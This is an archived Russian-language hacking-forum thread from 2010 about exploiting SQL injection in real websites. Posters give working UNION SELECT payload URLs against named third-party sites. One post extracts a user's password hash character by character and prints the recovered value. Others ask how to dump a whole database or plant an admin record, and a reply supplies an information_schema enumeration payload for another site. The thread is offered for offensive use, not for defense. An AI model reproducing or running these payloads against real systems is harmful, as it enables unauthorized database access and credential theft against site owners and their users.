ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.09.2010, 14:07
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,length(password),4,5 from soul_souluser where+id=1101181/*
=>
длина пароля 16
http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,mid(password,1,6),4,5 from soul_souluser where+id=1101181/*
=>
первые 6 символов '539818'
http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,ascii(mid(password,7,1)),4,5 from soul_souluser where+id=1101181/*
=>
ascii код 7-го символа 99 => 'c'
дальше можно самостоятельно
... добалено позже ...
не, решил дальше поизвращаться
http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,-(-ascii(mid(password,8,1))-100*ascii(mid(password,9,1))-100*100*ascii(mid(password,10,1))),4,5 from soul_souluser where+id=1101181/*
=>
ascii коды 10,9,8 символа = 544955 => '716'
http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,mid(password,8),4,5 from soul_souluser where+id=1101181/*
=>
8-13 символы = '716512'
http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,-(-ascii(mid(password,14,1))-1000*ascii(mid(password,15,1))-1000*1000*ascii(mid(password,16,1))),4,5 from soul_souluser where+id=1101181/*
=>
ascii коды 16,15,14 символа = 57049102 => 'f19'
password = '539818c716512f19'
проверяем
http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,if(password='539818c716512f19',1,8),4,5 from soul_souluser where+id=1101181/*
=>
1, т.е. пароль верный
кста, вариант с if(password=0x35333938313863373136353132663139,1,8 ) почему-то не прокатил. кто знает почему такое может быть ?
|
|
|
12.09.2010, 16:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
6784
Репутация:
0
|
|
Привет, подскажите, пожалуйста, чем побыстрее через инъекцию сдампить базу в 18к записей?
|
|
|
|
13.09.2010, 00:40
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
38021
Репутация:
3
|
|
Сообщение от rooopster
rooopster said:
Привет, подскажите, пожалуйста, чем побыстрее через инъекцию сдампить базу в 18к записей?
http://forum.xakepok.net/showthread.php?t=7222
|
|
|
|
13.09.2010, 16:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
1570
Репутация:
0
|
|
Существует такой запрос
INSERT table_names SET val1=firstname, val2=lastname
Значение val2 могу привести к любому виду.
Задача - добавить запись в table_admin или сделать вывод из table_users.
Возможно ли как-нибудь выкрутиться?
*сделать insert into outfile - не могу, нет прав
**обнаружить select, который бы принимал val2 пока не удалось
Сорри, если это боян. Буду признателен за любую помощь.
|
|
|
|
13.09.2010, 16:12
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от asia555
asia555 said:
Существует такой запрос
INSERT table_names SET val1=firstname, val2=lastname
Значение val2 могу привести к любому виду.
Задача - добавить запись в table_admin или сделать вывод из table_users.
Возможно ли как-нибудь выкрутиться?
*сделать insert into outfile - не могу, нет прав
**обнаружить select, который бы принимал val2 пока не удалось
Сорри, если это боян. Буду признателен за любую помощь.
я совсем не понял что надо делать, но если ты это хочечь то..
INSERT INTO table_users (val1, val2) values ('blabla','blabla');
выборка
вывод - Select val1,val2 from table_users limit 1;
а INSERT INTO outfile в первые слышу
|
|
|
|
13.09.2010, 18:33
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
Сообщение от asia555
asia555 said:
Существует такой запрос
INSERT table_names SET val1=firstname, val2=lastname
Значение val2 могу привести к любому виду.
Задача - добавить запись в table_admin или сделать вывод из table_users.
Возможно ли как-нибудь выкрутиться?
Тоже не совсем понял, что тебе нужно, но вывод,если я правильно понимаю, можно сделать так:
В поле lastname пишем запрос вида
Код:
Code:
',firstname=(select {Что_угодно} from table_users limit 1),lastname='pipiska
Если есть инъекция, то после выполнения запроса вместо имени будет выведено то, что было запрошено)
|
|
|
|
13.09.2010, 20:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
1570
Репутация:
0
|
|
Сорри, что криво объяснил.
OC - *nix, БД - MySQL. В БД три таблицы table_admin, table_users, table_names. В таблице table_names три поля - user_id, val1, val2.
user_id - это primary key, автоинкримент.
Я обращаюсь к скрипту, в котором есть такой запрос:
INSERT table_names SET user_id=1 val1=firstname, val2=lastname
с val2 я могу делать все что угодно.
Я хочу либо слить таблицу table_users либо добавить запись в table_admin.
Случай 1. Я могу привести запрос к виду:
INSERT table_names SET user_id=1, val1=firstname, val2=(select {Что_угодно} from table_users limit 1)
После чего весь нужный мне вывод попадает в val2 , но я его не вижу. Т.к. SELECT val2 у меня нигде не встречается.
Сообщение от Konqi
Konqi said:
а INSERT INTO outfile в первые слышу
Здесь я конечно ерунду написал.
Я имел ввиду, что если бы у меня были права на запись в какой-нибудь файл, то я мог бы попробовать сделать
INSERT table_names SET val1=firstname, val2=(select * from table_users into outfile 'file.txt'). Но так писать в файл я по-видимому не могу =(
Сегодня попробовал на локалхосте:
SELECT username from table_users where user_id=1 INTO outfile 'file.txt' - так работает, файл создается
INSERT table_names SET val1=firstname, val2=(SELECT username FROM table_users WHERE user_id=1 INTO outfile 'file.txt') - так не работает =(
Случай 2. Оставив попытки вывести select * from table_users, я хотел добавить запись в table_admin. Пробовал так:
INSERT table_names SET user_id=1 val1=firstname, val2=(lastname on duplicate key update table_admin SET )
user_id передаю заведомо дублирующийся.
Но насколько я понял, таким запросом с таблицей table_admin ничего не поделаешь. А точнее так - таким запросом не возможно воздействовать ни на какую таблицу кроме table_names. Так ли это?
Что еще можно попробовать сделать в первом и втором случае? |
|
|
|
13.09.2010, 21:10
|
|
Новичок
Регистрация: 21.10.2009
Сообщений: 27
Провел на форуме:
815635
Репутация:
16
|
|
Помогите раскрутить ету скулю.
Код:
Code:
http://polvent.com/index.php?action=catalog&brand=-2+UnIon+selECt+1,2,3,4,5,version(),7,8,9,10,11,12,13+from+admin--+
Знаю, что таблица админ. Но к information_schema.tables доступа нет. Или что там такое? Помогите пожалуйста.. |
|
|
|
13.09.2010, 21:25
|
|
Новичок
Регистрация: 25.11.2009
Сообщений: 0
Провел на форуме:
68379
Репутация:
0
|
|
moodoone, вот такого плана инъекция:
Сообщение от None
http://polvent.com/index.php?action=catalog&brand=-2+UNION+ALL+SELECT+1,2,3,4,5,(SELECT+cast(group_co ncat(table_name)+as+char)+FROM+information_schema. tables),7,8,9,10,11,12,13--
Дальше сам знаешь.
|
|
|
|
13.09.2010, 21:34
|
|
Новичок
Регистрация: 21.10.2009
Сообщений: 27
Провел на форуме:
815635
Репутация:
16
|
|
Спасибо! А где можна почитать про такого вида инъекции?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
